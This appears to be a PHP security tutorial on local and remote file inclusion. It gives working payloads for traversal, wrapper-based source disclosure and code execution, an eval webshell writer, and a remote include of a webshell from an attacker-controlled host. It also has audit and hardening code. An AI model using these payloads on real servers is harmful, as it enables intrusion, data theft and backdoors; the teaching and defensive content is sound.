PHP penetration test files contain vulnerabilities and methods of exploitation
2022-07-21 08:36:00 【Yisu cloud】
This article covers PHP file inclusion vulnerabilities and the ways they are exploited, a situation that comes up often in practical penetration testing, and closes with how to audit for and fix them.
What is a file inclusion vulnerability
File inclusion: when developers build a website, code that is reused in many places is usually put into a separate file, and other files pull it in by calling an include function. Many languages support this; PHP provides include, require, include_once and require_once. The purpose is to reduce code duplication and make the code easier to maintain.
A file inclusion vulnerability arises when the file name passed to one of these functions is controllable by the user. If the parameter is not validated, or the filter can be bypassed, an attacker can make the script include a file of their choosing: an arbitrary file on the local server (to read it, or to execute PHP code planted in it), or, when remote inclusion is enabled, a file fetched from a host they control. In short, because the included file name is user-controlled and not validated, other files are referenced and malicious code ends up being executed.
Classification of file inclusion vulnerabilities
They can be roughly divided into local file inclusion (LFI) and remote file inclusion (RFI).
Remote file inclusion: requires allow_url_fopen and allow_url_include to be enabled in php.ini; the included file lives on a third-party host.
Local file inclusion: the included file is on the local server.
Once remote inclusion is possible it is more direct and more damaging than local inclusion, because a file from any host the attacker controls can be included and executed at will.
Local file inclusion
As the name suggests, the include function pulls in a file that already exists on the local server.
Vulnerability and exploitation
Conditions (PHP as the example)
1. include or a similar function is called with a dynamic variable as its argument
2. The user can control that variable
What is a dynamic variable?
For example, in http://127.0.0.1/include.php?in=../../../etc/passwd the parameter in=../../../etc/passwd is a variable the user sets freely in the request.
Read files directly
?xx=/etc/passwd # read the sensitive file passwd by absolute path
?xx=../../../etc/passwd # or by traversing up from the web root
Read source code through a wrapper
?xx=php://filter/read=convert.base64-encode/resource=xx.php # returns the PHP file's source base64-encoded instead of executing it
%00 truncation
Suppose the vulnerable code is:
<?php
if (isset($_GET['shell'])) {
    include($_GET['shell'] . ".php"); // appends .php to whatever the user supplied, then includes it
} else {
    include("index.php");
}
?>
Suppose we upload a picture that carries PHP code as tpm.jpg. Requesting http://127.0.0.1/index.php?shell=tpm.jpg makes the script try to include tpm.jpg.php, which does not exist, so the page reports an error. If a %00 is appended after .jpg (?shell=tpm.jpg%00), the C-level file functions stop at the null byte, the appended .php is dropped and tpm.jpg itself is included; this may bypass the suffix.
Conditions: magic_quotes_gpc=off in php.ini, and PHP version < 5.3.4 (later versions reject paths that contain a null byte).
Length truncation
Vulnerable code:
<?php
$file = $_GET['shell'];
include($file . '.jpg');
?>
The principle is the same as above: write PHP code into a file such as 1.txt, then, knowing the target server's platform, pad the file name with enough /. (or .) characters that the path exceeds the length the server's path handling accepts; the appended '.jpg' falls beyond the limit and is discarded, so 1.txt is included.
Conditions: on Windows the '/.' padding must take the path beyond 256 characters; on Linux beyond 4096.
PHP wrappers (pseudo-protocols)
file://
Purpose:
Access local files; commonly used in CTF file inclusion challenges
Conditions:
allow_url_fopen=off/on
allow_url_include=off/on (neither switch matters for a local file)
Examples:
Absolute path and file name
http://127.0.0.1/include.php?file=file://C:\phpStudy\PHPTutorial\WWW\phpinfo.txt
Relative path and file name (no wrapper needed)
http://127.0.0.1/include.php?file=./phpinfo.txt
Network path and file name (this goes through the http:// wrapper, so it is a remote include and needs allow_url_include=on)
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
php://
Purpose:
php:// gives access to PHP's input/output streams (I/O)
Two are commonly used:
php://filter for reading source code
php://input for executing PHP code
Conditions:
php://filter: allow_url_fopen=off/on, allow_url_include=off/on (it is a local stream and works either way)
php://input: allow_url_include=on (include() treats it as a URL stream)
Examples
php://filter/read=convert.base64-encode/resource=[file name] // read the file's source base64-encoded
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
php://input + POST body to execute PHP code
http://127.0.0.1/include.php?file=php://input
[POST DATA part]
<?php phpinfo(); ?>
If the web directory is writable, POST a one-line shell that writes itself to disk:
<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
data://
Conditions:
allow_url_fopen=on
allow_url_include=on
Purpose:
From PHP 5.2.0 the data:// wrapper is available; it carries inline data in the stated format (plain text or base64), so PHP code can be supplied directly in the URL and executed
Examples
#1. data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
#2. data://text/plain;base64, (PD9waHAgcGhwaW5mbygpOz8+ is the base64 of <?php phpinfo();?>, with the trailing + URL-encoded as %2b)
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
phar://
phar:// behaves like zip://: it reads the contents of an archive (phar archives, including zip-format ones), so a file hidden inside an uploaded archive can be included
http://127.0.0.1/include.php?file=phar://C:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt
Conditions: PHP >= 5.3 (the phar extension has been bundled since 5.3)
Creating an archive with the Phar class from PHP code requires phar.readonly=off; reading one through the phar:// wrapper does not. Because PHP unserializes a phar's metadata when the archive is opened through phar://, the wrapper also widens the attack surface for PHP deserialization vulnerabilities.
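To turn the conditions listed for php://, data://, phar:// and remote inclusion above into a quick check, here is an added example (not code from the article) that reports which of those wrappers are usable on the PHP host it runs on, and round-trips its own source through the article's php://filter payload. It assumes only a stock PHP CLI; the technique names in the report are its own labels.

```php
<?php
// Added example (not from the article): report which include wrappers
// discussed above are usable on the host running this script.
declare(strict_types=1);

function iniBool(string $name): bool
{
    // ini_get() returns "1"/"0", "" or "On"/"Off" depending on how php.ini spells it
    return filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN);
}

/**
 * Map each technique from the article to whether this host allows it.
 */
function wrapperReport(): array
{
    $wrappers   = stream_get_wrappers();
    $urlInclude = iniBool('allow_url_include');
    $urlFopen   = iniBool('allow_url_fopen');
    $hasPhp     = in_array('php', $wrappers, true);
    $hasPhar    = in_array('phar', $wrappers, true);

    return [
        // php://filter is a local stream: include() accepts it regardless of allow_url_*
        'php://filter (read source)'   => $hasPhp,
        // php://input and data:// are treated as URLs by include(): allow_url_include must be On
        'php://input (run POST body)'  => $hasPhp && $urlInclude,
        'data:// (inline code)'        => in_array('data', $wrappers, true) && $urlInclude,
        // remote inclusion needs both switches
        'http:// (remote include)'     => in_array('http', $wrappers, true) && $urlFopen && $urlInclude,
        // phar:// reads archives locally; phar.readonly only blocks *creating* archives with PHP
        'phar:// (archive contents)'   => $hasPhar,
        'Phar class can write archive' => $hasPhar && !iniBool('phar.readonly'),
    ];
}

/**
 * The article's php://filter payload applied locally: the base64 text is what
 * an attacker sees in the response; decoding it yields the original source.
 */
function readSourceViaFilter(string $path): string
{
    $b64 = file_get_contents('php://filter/read=convert.base64-encode/resource=' . $path);
    $src = base64_decode($b64, true);
    return $src === false ? '' : $src;
}

foreach (wrapperReport() as $technique => $usable) {
    printf("%-32s %s\n", $technique, $usable ? 'usable' : 'blocked');
}

$source = readSourceViaFilter(__FILE__);
printf("\nphp://filter round trip recovered %d bytes of %s (identical: %s)\n",
    strlen($source), basename(__FILE__), $source === file_get_contents(__FILE__) ? 'yes' : 'no');
```

Run it with `php wrappers.php` on the target's PHP build (or any build with the same php.ini) before choosing a payload: a host with allow_url_include off still leaks source through php://filter, but php://input and data:// will fail there.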
Remote file inclusion
The server includes a file through a PHP function, and because the file name is not strictly filtered, a malicious file hosted on a server the attacker controls can be included and executed, achieving the attacker's goal.
Exploitation
Conditions:
allow_url_include = On
allow_url_fopen = On
Remote inclusion of a webshell
?xxx=http://attacker's VPS/shell.txt
# writes a Trojan named shell.php into the website directory
The content of shell.txt is:
<?php fputs(fopen('./shell.php','w'),'<?php @eval($_POST[123]) ?>');?>
(It is served as .txt so the attacker's own server returns the source rather than executing it; the target executes it once it is included.)
Code audit
Functions used for file inclusion
include() // the file is included only when execution reaches this call; if it fails PHP emits a warning and continues
include_once() // same as include, except that a file already included is not included again
require() // like include, but a failure to include the file is a fatal error: an error message is printed and the script stops immediately
require_once() // same as require, except that a file already included is not included again
During a code audit, search the whole codebase for the functions above.
If the inclusion is combined with an image upload, also search for the $_FILES variable, because PHP's upload handling code almost always works with $_FILES.
Look at the directory structure, paying attention to directories such as includes and modules, and check whether index.php includes their contents dynamically and whether the variable it uses is controllable.
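Searching for the four functions by name returns every static include too. The following added example (not code from the article) uses PHP's own tokenizer to keep only the calls whose operand is built from a variable, and marks whether a request superglobal appears in it directly. The sample source it scans is constructed here, modelled on the article's vulnerable snippets.

```php
<?php
// Added example (not from the article): a code-audit helper that lists every
// include/require whose operand is built from a variable, using token_get_all().
declare(strict_types=1);

const INCLUDE_TOKENS = [T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE];
const REQUEST_SUPERGLOBALS = ['$_GET', '$_POST', '$_REQUEST', '$_COOKIE', '$_FILES', '$_SERVER'];

/**
 * Scan PHP source and return one finding per dynamic include:
 *   ['line' => int, 'func' => string, 'expr' => string, 'source' => string]
 * source is 'request' when a request superglobal appears in the operand
 * directly, or 'variable' when only ordinary variables do (trace them).
 */
function findDynamicIncludes(string $code): array
{
    $tokens   = token_get_all($code);
    $count    = count($tokens);
    $findings = [];

    for ($i = 0; $i < $count; $i++) {
        $tok = $tokens[$i];
        if (!is_array($tok) || !in_array($tok[0], INCLUDE_TOKENS, true)) {
            continue;
        }
        // Collect the operand: everything up to the statement's ';' (or the
        // ')' that closes an enclosing expression), tracking parentheses.
        $expr   = '';
        $source = null;
        $depth  = 0;
        for ($j = $i + 1; $j < $count; $j++) {
            $t = $tokens[$j];
            if (is_array($t)) {
                if ($t[0] === T_VARIABLE) {
                    $isRequest = in_array($t[1], REQUEST_SUPERGLOBALS, true);
                    $source = ($source === 'request' || $isRequest) ? 'request' : 'variable';
                }
                $expr .= $t[1];
                continue;
            }
            if ($t === '(') {
                $depth++;
            } elseif ($t === ')') {
                if ($depth === 0) {
                    break;
                }
                $depth--;
            } elseif ($t === ';' && $depth === 0) {
                break;
            }
            $expr .= $t;
        }
        if ($source !== null) {
            $findings[] = [
                'line'   => $tok[2],
                'func'   => strtolower($tok[1]),
                'expr'   => trim($expr),
                'source' => $source,
            ];
        }
    }
    return $findings;
}

// Constructed sample, modelled on the article's snippets (not real project code).
$sample = <<<'PHP'
<?php
require __DIR__ . '/lib/common.php';          // static: not reported
include_once 'header.php';                    // static: not reported
if (isset($_GET['shell'])) {
    include($_GET['shell'] . ".php");         // request-controlled
} else {
    include("index.php");
}
$file = $_GET['shell'];
include($file . '.jpg');                      // plain variable: trace $file
$tpl = "themes/" . $theme . "/page.php";
require_once($tpl);                           // plain variable: trace $tpl
PHP;

foreach (findDynamicIncludes($sample) as $f) {
    printf("line %-3d %-12s [%-8s] %s\n", $f['line'], $f['func'], $f['source'], $f['expr']);
}
```

Point it at real files with `file_get_contents()` instead of the sample; the 'variable' findings are where a manual trace back to $_GET, $_POST or $_FILES is still needed, which is exactly the work the article describes.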
Repair suggestions
Disable remote file inclusion:
allow_url_include=off
Configure
open_basedir=<directory>
to restrict the area PHP is allowed to access.
Filter special sequences such as ../ from the parameter.
Move the Apache log files away from their default location, so their path cannot be guessed for inclusion.
Enable magic quotes:
magic_quotes_gpc=on
(this setting only exists in PHP < 5.4; it was removed in 5.4, so on current versions rely on the other measures)
Avoid calling files through dynamic variables; write the file to be included directly in the code.
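Putting the last two suggestions into code, here is an added example (not from the article) that replaces the article's `include($_GET['shell'] . ".php")` with an allowlist lookup plus a realpath() containment check, then runs the article's own payloads through it. The page names, the temporary pages directory and the rejection rules are assumptions made for the demo.

```php
<?php
// Added example (not from the article): hardened replacement for the
// article's dynamic include, exercised with the article's payloads.
declare(strict_types=1);

// Vulnerable pattern from the article, kept only as a comment for comparison:
//   include($_GET['shell'] . ".php");
// The user chooses the path, so ../, %00 and wrapper prefixes all reach include().

// Hardened: the user chooses a key, the server chooses the file (allowlist),
// and the resolved path is verified to stay under the pages directory.
// Keys and file names here are assumptions for the demo.
const PAGE_MAP = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

function resolveInclude(string $page, string $baseDir): ?string
{
    // 1. Only a short plain identifier is accepted: this rejects '../', null
    //    bytes and any wrapper prefix such as php:// or data:// before they
    //    reach a filesystem call (PHP 8 throws on paths containing "\0").
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $page)) {
        return null;
    }
    // 2. Allowlist lookup: unknown keys are refused, never "tried".
    if (!isset(PAGE_MAP[$page])) {
        return null;
    }
    // 3. Defence in depth (what open_basedir does globally): realpath()
    //    follows symlinks and collapses '..', so the result must still start
    //    with the base directory plus a separator.
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . PAGE_MAP[$page]);
    if ($base === false || $target === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// --- demo: a throw-away pages directory with one real page ---
$pages = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($pages, 0700);
file_put_contents($pages . DIRECTORY_SEPARATOR . 'home.php', "<?php echo 'home page';\n");

$payloads = [
    'home',                                                    // legitimate key
    'about',                                                   // allowed key, file missing
    '../../../etc/passwd',                                     // traversal
    'php://filter/read=convert.base64-encode/resource=index',  // source disclosure
    "tpm.jpg\0",                                               // %00 truncation
    'data://text/plain,<?php phpinfo();?>',                    // inline code
    'http://127.0.0.1/phpinfo.txt',                            // remote include
];

foreach ($payloads as $p) {
    $resolved = resolveInclude($p, $pages);
    printf("%-58s -> %s\n", addcslashes($p, "\0"),
        $resolved === null ? 'rejected' : 'include ' . basename($resolved));
    if ($resolved !== null) {
        include $resolved;   // only ever a file the allowlist chose
        echo "\n";
    }
}

// cleanup
unlink($pages . DIRECTORY_SEPARATOR . 'home.php');
rmdir($pages);
```

Only the 'home' key is included; everything else, including the allowed-but-absent 'about', is rejected before any filesystem call sees the attacker's string. The containment check in step 3 is redundant with the allowlist on purpose: if someone later relaxes step 1, the realpath() comparison still keeps includes inside the pages directory.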